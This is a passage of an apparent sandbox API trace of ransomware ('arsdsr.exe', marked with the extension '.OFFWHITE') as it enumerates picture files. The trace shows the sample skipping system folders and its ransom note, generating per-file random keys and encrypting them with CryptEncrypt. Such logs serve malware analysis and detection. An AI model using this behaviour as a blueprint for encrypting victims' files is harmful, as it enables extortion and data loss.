returned 0x500000 [0146.806] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5645c8 [0146.806] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.806] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.806] SystemFunction036 (in: RandomBuffer=0x526940, RandomBufferLength=0x10 | out: RandomBuffer=0x526940) returned 1 [0146.806] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.806] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.806] SystemFunction036 (in: RandomBuffer=0x526958, RandomBufferLength=0x10 | out: RandomBuffer=0x526958) returned 1 [0146.806] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.806] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.807] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5644c0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5644c0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.807] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.807] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.807] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5645c8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5645c8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.807] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.807] SetLastError (dwErrCode=0x0) [0146.807] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5644c0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.807] GetLastError () returned 0x6 [0146.807] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae607689, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae607689, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc50c9f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile40.bmp", cAlternateFileName="")) returned 1 [0146.807] lstrcmpiW (lpString1="usertile40.bmp", lpString2=".") returned 1 [0146.807] lstrcmpiW (lpString1="usertile40.bmp", lpString2="..") returned 1 [0146.807] lstrcmpiW (lpString1="usertile40.bmp", lpString2="...") returned 1 [0146.807] lstrcmpiW (lpString1="usertile40.bmp", lpString2="windows") returned -1 [0146.808] lstrcmpiW (lpString1="usertile40.bmp", lpString2="$recycle.bin") returned 1 [0146.808] lstrcmpiW (lpString1="usertile40.bmp", lpString2="rsa") returned 1 [0146.808] lstrcmpiW (lpString1="usertile40.bmp", lpString2="ntuser.dat") returned 1 [0146.808] lstrcmpiW (lpString1="usertile40.bmp", lpString2="programdata") returned 1 [0146.808] lstrcmpiW (lpString1="usertile40.bmp", lpString2="appdata") returned 1 [0146.808] lstrcmpiW (lpString1="usertile40.bmp", lpString2="program files") returned 1 [0146.808] lstrcmpiW (lpString1="usertile40.bmp", lpString2="program files (x86)") returned 1 [0146.808] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.808] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile40.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" [0146.808] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.808] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.808] PathFindExtensionW (pszPath="usertile40.bmp") returned=".bmp" [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.808] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.809] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.809] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.809] lstrcmpiW (lpString1="usertile40.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.809] GetProcessHeap () returned 0x500000 [0146.809] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526a68 [0146.809] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.809] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.809] GetProcessHeap () returned 0x500000 [0146.809] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526970 [0146.809] GetProcessHeap () returned 0x500000 [0146.809] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526988 [0146.809] GetProcessHeap () returned 0x500000 [0146.809] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5647e0 [0146.809] GetProcessHeap () returned 0x500000 [0146.809] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5648e8 [0146.809] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.809] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.809] SystemFunction036 (in: RandomBuffer=0x526970, RandomBufferLength=0x10 | out: RandomBuffer=0x526970) returned 1 [0146.809] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.810] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.810] SystemFunction036 (in: RandomBuffer=0x526988, RandomBufferLength=0x10 | out: RandomBuffer=0x526988) returned 1 [0146.810] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.810] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.810] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5647e0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5647e0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.810] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.810] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.810] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5648e8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5648e8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.810] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.810] SetLastError (dwErrCode=0x0) [0146.810] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5647e0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.810] GetLastError () returned 0x6 [0146.810] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae62d7e6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae62d7e6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddcc30b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile41.bmp", cAlternateFileName="")) returned 1 [0146.811] lstrcmpiW (lpString1="usertile41.bmp", lpString2=".") returned 1 [0146.811] lstrcmpiW (lpString1="usertile41.bmp", lpString2="..") returned 1 [0146.811] lstrcmpiW (lpString1="usertile41.bmp", lpString2="...") returned 1 [0146.811] lstrcmpiW (lpString1="usertile41.bmp", lpString2="windows") returned -1 [0146.811] lstrcmpiW (lpString1="usertile41.bmp", lpString2="$recycle.bin") returned 1 [0146.811] lstrcmpiW (lpString1="usertile41.bmp", lpString2="rsa") returned 1 [0146.811] lstrcmpiW (lpString1="usertile41.bmp", lpString2="ntuser.dat") returned 1 [0146.811] lstrcmpiW (lpString1="usertile41.bmp", lpString2="programdata") returned 1 [0146.811] lstrcmpiW (lpString1="usertile41.bmp", lpString2="appdata") returned 1 [0146.811] lstrcmpiW (lpString1="usertile41.bmp", lpString2="program files") returned 1 [0146.811] lstrcmpiW (lpString1="usertile41.bmp", lpString2="program files (x86)") returned 1 [0146.811] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.811] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile41.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" [0146.811] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.811] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.811] PathFindExtensionW (pszPath="usertile41.bmp") returned=".bmp" [0146.811] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.811] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.811] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.811] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.811] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.811] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.811] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.811] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.811] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.811] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.812] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.812] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.812] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.812] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.812] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.812] lstrcmpiW (lpString1="usertile41.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.812] GetProcessHeap () returned 0x500000 [0146.812] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526a78 [0146.812] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.812] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.812] GetProcessHeap () returned 0x500000 [0146.812] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5269a0 [0146.812] GetProcessHeap () returned 0x500000 [0146.812] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5269b8 [0146.812] GetProcessHeap () returned 0x500000 [0146.812] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5649f0 [0146.812] GetProcessHeap () returned 0x500000 [0146.813] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x564af8 [0146.813] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.813] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.813] SystemFunction036 (in: RandomBuffer=0x5269a0, RandomBufferLength=0x10 | out: RandomBuffer=0x5269a0) returned 1 [0146.813] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.813] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.813] SystemFunction036 (in: RandomBuffer=0x5269b8, RandomBufferLength=0x10 | out: RandomBuffer=0x5269b8) returned 1 [0146.813] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.813] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.813] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5649f0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5649f0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.813] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.813] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.813] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x564af8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x564af8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.813] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.813] SetLastError (dwErrCode=0x0) [0146.813] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5649f0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.814] GetLastError () returned 0x6 [0146.814] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddce9217, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile42.bmp", cAlternateFileName="")) returned 1 [0146.814] lstrcmpiW (lpString1="usertile42.bmp", lpString2=".") returned 1 [0146.814] lstrcmpiW (lpString1="usertile42.bmp", lpString2="..") returned 1 [0146.814] lstrcmpiW (lpString1="usertile42.bmp", lpString2="...") returned 1 [0146.814] lstrcmpiW (lpString1="usertile42.bmp", lpString2="windows") returned -1 [0146.814] lstrcmpiW (lpString1="usertile42.bmp", lpString2="$recycle.bin") returned 1 [0146.814] lstrcmpiW (lpString1="usertile42.bmp", lpString2="rsa") returned 1 [0146.814] lstrcmpiW (lpString1="usertile42.bmp", lpString2="ntuser.dat") returned 1 [0146.814] lstrcmpiW (lpString1="usertile42.bmp", lpString2="programdata") returned 1 [0146.814] lstrcmpiW (lpString1="usertile42.bmp", lpString2="appdata") returned 1 [0146.814] lstrcmpiW (lpString1="usertile42.bmp", lpString2="program files") returned 1 [0146.814] lstrcmpiW (lpString1="usertile42.bmp", lpString2="program files (x86)") returned 1 [0146.814] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.814] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile42.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" [0146.814] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.814] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.814] PathFindExtensionW (pszPath="usertile42.bmp") returned=".bmp" [0146.814] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.814] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.814] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.814] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.814] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.814] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.814] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.815] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.815] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.815] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.815] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.815] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.815] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.815] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.815] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.815] lstrcmpiW (lpString1="usertile42.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.815] GetProcessHeap () returned 0x500000 [0146.815] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526a88 [0146.815] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.815] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.815] GetProcessHeap () returned 0x500000 [0146.815] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5269d0 [0146.815] GetProcessHeap () returned 0x500000 [0146.815] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5269e8 [0146.815] GetProcessHeap () returned 0x500000 [0146.815] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x564c00 [0146.815] GetProcessHeap () returned 0x500000 [0146.815] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x564d08 [0146.816] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.816] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.816] SystemFunction036 (in: RandomBuffer=0x5269d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5269d0) returned 1 [0146.816] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.816] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.816] SystemFunction036 (in: RandomBuffer=0x5269e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5269e8) returned 1 [0146.816] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.816] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.816] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x564c00*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x564c00*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.816] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.816] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.816] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x564d08*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x564d08*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.816] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.816] SetLastError (dwErrCode=0x0) [0146.817] WriteFile (in: hFile=0xffffffff, lpBuffer=0x564c00, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.817] GetLastError () returned 0x6 [0146.817] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd0f375, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile43.bmp", cAlternateFileName="")) returned 1 [0146.817] lstrcmpiW (lpString1="usertile43.bmp", lpString2=".") returned 1 [0146.817] lstrcmpiW (lpString1="usertile43.bmp", lpString2="..") returned 1 [0146.817] lstrcmpiW (lpString1="usertile43.bmp", lpString2="...") returned 1 [0146.817] lstrcmpiW (lpString1="usertile43.bmp", lpString2="windows") returned -1 [0146.817] lstrcmpiW (lpString1="usertile43.bmp", lpString2="$recycle.bin") returned 1 [0146.817] lstrcmpiW (lpString1="usertile43.bmp", lpString2="rsa") returned 1 [0146.817] lstrcmpiW (lpString1="usertile43.bmp", lpString2="ntuser.dat") returned 1 [0146.817] lstrcmpiW (lpString1="usertile43.bmp", lpString2="programdata") returned 1 [0146.817] lstrcmpiW (lpString1="usertile43.bmp", lpString2="appdata") returned 1 [0146.817] lstrcmpiW (lpString1="usertile43.bmp", lpString2="program files") returned 1 [0146.817] lstrcmpiW (lpString1="usertile43.bmp", lpString2="program files (x86)") returned 1 [0146.817] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.817] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile43.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" [0146.817] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.817] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.817] PathFindExtensionW (pszPath="usertile43.bmp") returned=".bmp" [0146.817] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.817] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.817] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.817] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.817] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.817] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.818] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.818] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.818] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.818] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.818] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.818] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.818] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.818] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.818] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.818] lstrcmpiW (lpString1="usertile43.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.818] GetProcessHeap () returned 0x500000 [0146.818] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526a98 [0146.818] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.818] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.818] GetProcessHeap () returned 0x500000 [0146.818] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526a00 [0146.818] GetProcessHeap () returned 0x500000 [0146.818] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526a18 [0146.818] GetProcessHeap () returned 0x500000 [0146.818] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x564e10 [0146.819] GetProcessHeap () returned 0x500000 [0146.819] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x564f18 [0146.819] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.819] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.819] SystemFunction036 (in: RandomBuffer=0x526a00, RandomBufferLength=0x10 | out: RandomBuffer=0x526a00) returned 1 [0146.819] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.819] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.819] SystemFunction036 (in: RandomBuffer=0x526a18, RandomBufferLength=0x10 | out: RandomBuffer=0x526a18) returned 1 [0146.819] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.819] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.819] 